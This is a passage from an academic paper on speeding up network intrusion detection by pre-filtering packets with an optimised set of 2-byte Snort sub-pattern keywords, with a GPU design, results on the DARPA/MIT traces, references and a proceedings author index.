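        print(f"distinct 2B {how}: {len(candidate_keywords(PATTERNS, how))}")
    cost, chosen = select_keywords()
    print("optimised keyword set:", chosen, "objective:", round(cost, 4))
```

With the constructed data the rudimentary sub-string set shrinks from 32 candidates to 3 keywords, each shared by two or more patterns and absent from the background payload. The `size_penalty` term matters in practice: with objective (3) alone every zero-probability keyword is free, so the solver has no reason to prefer a small set.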
4 Advantages in Utilizing GPU
Now we have a relatively small filter keyword set with only several hundred 2-byte patterns, which is ready for an efficient pre-filtering implementation on a GPU. A schematic is depicted in Fig. 2. The incoming packets are copied to the device memory of the GPU, while the keyword set is stored in the shared memory of each multiprocessor on the GPU. Each SP (stream processor) can execute multiple threads at the same time, each thread doing the filtering task on one packet based on the filter keyword set; therefore, thousands of packets are processed in parallel. The pre-filtering results are copied back to the CPU, which uses them to determine whether or not to perform a full pattern matching on a specific packet.

Fig. 2. A schema for pre-filtering using GPU (incoming packets in a packet buffer are copied to the GPU device memory; the keyword set resides in the shared memory of each multiprocessor, whose SPs scan packets in parallel; the filter results are returned to the CPU, which runs the full PM on flagged packets to produce the final results)
The G80 series and later GPUs are designed as highly parallel, massively-threaded, many-core processors. They are optimized for computation-intensive applications that execute the same program on many data elements in parallel, i.e. in SIMD fashion. Our method is well prepared for an implementation on such a SIMD GPU for the following reasons:

(1) Uniform processing. A GPU is good at uniform processing, which is determined by its SIMD architecture. In our method all sub-patterns in the keyword set have the same length, so the processing is almost uniform.

(2) A lot of room for parallel processing on the GPU. The size of the optimized keyword set is 362. The maximum number of concurrent threads of a multiprocessor (MP) in the GPU is 768 [14]. Using a fast multi-pattern matching algorithm such as Aho-Corasick [15], each thread can run an instance of the matching finite automaton and scan the payload of a single packet; with the 16 MPs of a G80 [10] we then have 12288 (768 × 16) threads matching different texts in parallel.

(3) Fast data access on the GPU. The memory required for the keyword set is only several kilobytes, so it fits in the shared memory of the GPU, which supports very fast random access. Moreover, once copied onto the GPU, all sub-patterns can reside there for the whole pre-filtering process, which reduces the number of time-consuming data exchanges between GPU and CPU.
5 Experiments and Results
In this section we present experiments to verify the effectiveness of our method. We use the traffic traces from the "1999 DARPA Intrusion Detection Evaluation Data Set" provided by MIT, including both attack and attack-free traces.

5.1 Sub-Pattern Extraction and the BILP Optimization
We use the Snort pattern set (2009-01-20) to extract 2-byte sub-patterns. The numbers of distinct 2-byte prefixes, suffixes and sub-strings are listed in Table 2.

Table 2. Number of distinct sub-patterns

Type            Amount
2B Prefix       1162
2B Suffix       1229
2B Sub Strings  4824
The BILP method aims at decreasing the size of the keyword set obtained with the sub-string-based method. We run our BILP model in LINGO 11 on the 2-byte sub-strings generated above. The original number of 2-byte sub-strings is 4824; after optimization, a small set of 362 2-byte sub-strings is obtained.

5.2 Pre-filtering Effects

After optimizing the filter keyword set, we use the traces from MIT to evaluate the effect of pre-filtering. The results are shown in Table 3. The filtered ratio (FR) is calculated as

$$FR = 1 - \frac{FKMT}{TB} \qquad (1)$$

where FKMT is the Filter Keyword Match Times and TB is the Total Bytes. We obtain FKMT and TB by sending the packets through the pre-filter: we count how many times a match of any filter keyword is found (FKMT), and we record the total number of bytes in the trace (TB). Note that a match is not wasted work: when a filter keyword matches, the matched position can be recorded and sent to the pattern matching engine together with the packet, so the engine does not need to start its scan from the beginning of the payload. Table 3 shows that with our optimized 2-byte sub-string method the FR is higher than 90 percent, much better than the other methods, so our optimization pays off. The unoptimized sub-string set (all 4824 sub-strings) filters almost nothing, since with so many 2-byte keywords a match is found in nearly every packet. Moreover, there is no need to use 3-byte or longer sub-strings: a longer sub-string cannot outperform the 2-byte sub-string by much, but adds complexity to both computation and optimization.

Table 3. Pre-filtering results (FR)

Method                outside.tcpdump  inside.tcpdump  5th Monday
Prefix                0.782            0.725           0.844
Suffix                0.747            0.693           0.826
Sub String            0.009            0.161           0.322
Optimized sub string  0.938            0.925           0.957
6 Conclusions and Future Work
In this paper, pre-filtering is introduced to alleviate the workload of the NIDS pattern matching engine. According to our analysis, we chose 2-byte ASCII sub-patterns as the filter keywords. We also proposed a BILP-based method to optimize the filter keyword selection; the size of the keyword set is greatly reduced, from 4824 to 362. Experiment results on MIT's IDS evaluation dataset show that the pre-filtering result is quite good. We also pointed out that the pre-filter obtained by our method is well prepared for an implementation on GPU. Future work includes the implementation of the pre-filter on GPU, and a schema using multiple GPUs.
References

1. Snort: the de-facto network intrusion detection system, http://www.snort.org
2. Antonatos, S., Anagnostakis, K.G., Markatos, E.P.: Generating realistic workloads for network intrusion detection systems. ACM SIGSOFT Software Engineering Notes 29, 207–215 (2004)
3. Van Lunteren, J.: High-Performance Pattern-Matching for Intrusion Detection. In: Proceedings of IEEE INFOCOM, pp. 1–13 (2006)
4. Zheng, K., Lu, H.: Scalable Pattern-Matching via Dynamic Differentiated Distributed Detection (D4). In: Proceedings of IEEE GLOBECOM (2008)
5. Song, T., Zhang, W., Wang, D., Xue, Y.: A memory efficient multiple pattern matching architecture for network security. In: INFOCOM, pp. 673–681. IEEE, Piscataway (2008)
6. Tan, L., Sherwood, T.: A High Throughput String Matching Architecture for Intrusion Detection and Prevention. In: Proceedings of the 32nd Annual International Symposium on Computer Architecture, vol. 4, pp. 112–122 (2005)
7. Baker, Z.K., Prasanna, V.K.: Time and area efficient pattern matching on FPGAs. In: Proceedings of the 2004 ACM/SIGDA 12th International Symposium on Field Programmable Gate Arrays, pp. 223–232. ACM, New York (2004)
8. Dharmapurikar, S., Lockwood, J.W.: Fast and scalable pattern matching for network intrusion detection systems. IEEE Journal on Selected Areas in Communications 24, 1781–1791 (2006)
9. Yu, F., Katz, R.H., Lakshman, T.V.: Gigabit rate packet pattern-matching using TCAM. In: Proceedings of the 12th IEEE International Conference on Network Protocols, pp. 174–183 (2004)
10. Nvidia G80 Specs, http://www.nvidian.com/page/8800_features.html
11. Marziale, L., Richard, G.G., Roussev, V.: Massive threading: Using GPUs to increase the performance of digital forensics tools. Digital Investigation 4, 73–81 (2007)
12. Vasiliadis, G., Antonatos, S., Polychronakis, M., Markatos, E.P., Ioannidis, S.: Gnort: High performance network intrusion detection using graphics processors. In: Lippmann, R., Kirda, E., Trachtenberg, A. (eds.) RAID 2008. LNCS, vol. 5230, pp. 116–134. Springer, Heidelberg (2008)
13. Goyal, N., Ormont, J., Smith, R., Sankaralingam, K., Estan, C.: Signature Matching in Network Processing using SIMD/GPU Architectures. UW CS Technical Report 1628 (January 2008)
14. Nvidia CUDA Programming Guide 2.1, http://developer.download.nvidia.com/compute/cuda/2_1/NVIDIA_CUDA_Programming_Guide_2.1.pdf
15. Aho, A.V., Corasick, M.J.: Efficient String Matching: An Aid to Bibliographic Search. Communications of the ACM 18, 333–340 (1975)
Author Index
Ahmad, Yasir 9
Ahmadinejad, Seyed Hossein 18
Almazyad, Abdulaziz S. 9
Au, Man Ho 234
Babu, A. Vinaya 281
Bandyopadhyay, Samir Kumar 43, 64
Bhattacharyya, Debnath 43, 64
Cai, Zhiping 132, 176, 298
Carvalho, David A. 265
Chang, Feng-Cheng 1
Cheng, Jieren 132, 176, 298
Chin, Ji-Jian 93
Cho, Jeonghun 100
Choi, Jongmyung 26
Choi, Min-Kyu 289
Chung, Bo-heung 51
Das, Poulami 43, 64
Deng, Robert 242
Drahanský, Martin 217, 225
Fang, Wai-Chi 1
Freire, Mário M. 265
Goi, Bok-Min 93
Gunawan, Linda Ariani 72
Gupta, Phalguni 157, 201
Han, Min-ho 51
Hanáček, Petr 217, 225
He, Hong-qi 140
Heng, Swee-Huay 93
Herrmann, Peter 72
Hong, Jaeseung 100
Huang, Hsiang-Cheh 1
Huang, Qiong 234
Huh, Eui-Nam 193
Hur, Seung-yong 185
Irani, Mohammad Tabatabai 250
Islam, Mohammad Rakibul 108
Jalili, Saeed 18
Jeong, Jae-goo 185
Jiang, Lie-hui 140
Jin, Haimin 124
Jung, BoHeung 57
Jung, Hyuncheol 165
Kang, DongHo 57
Kim, Jinsang 108
Kim, Jongwung 100
Kim, Ki-young 51, 57
Kim, Tai-hoon 43, 64
King, Brian 273
Kisku, Dakshina Ranjan 157, 201
Ko, Hoon 26
Kraemer, Frank Alexander 72
Lee, Gang-Soo 185
Lee, Kyung-Seok 165
Li, Ji-zhong 140
Li, Tieyan 242
Li, Yingjiu 242
Li, Zhenhao 148
Liu, Chengyu 116
Liu, Tie-Ming 140
Liu, Yun 132, 176
Mu, Yi 234
Muyaha, Fahad bin 86
Nagy, Jan 217
Naidu, G.A. 281
Niu, Hanhui 116
Ogiela, Marek R. 35
Ogiela, Urszula 35
Orság, Filip 225, 258
Pecho, Peter 217
Pereira, Manuela 265
Rahim, Aneel 86
Raju, M.S.V.S. Bhadri 281
Ramos, Carlos 26
Reddy, L. Pratap 281
Ren, Jinglei 148
Robles, Rosslin John 289
Sing, Jamuna Kanta 157, 201
Song, Biao 193
Sun, Chen 148
Susilo, Willy 234
Thorncharoensri, Pairat 234
Tian, Minli 116
Tian, Yuan 193
Vardhan, B. Vishnu 281
Wei, Yonglong 148
Weippl, Edgar R. 250
Wong, Duncan S. 124, 234
Wu, Chengkun 132, 298
Xu, Yinlong 124
Yan, Qiang 242
Yang, Hengsheng 116
Yang, Na 116
Yin, Jianping 132, 176, 298
Yoon, Seokung 165
Yu, Xian 140
Zhai, Gaoshou 116
Zhang, Boyun 176
Zheng, Xiaojuan 148
Zheng, Xudong 148
Zhu, En 298
Ziauddin, Sheikh 209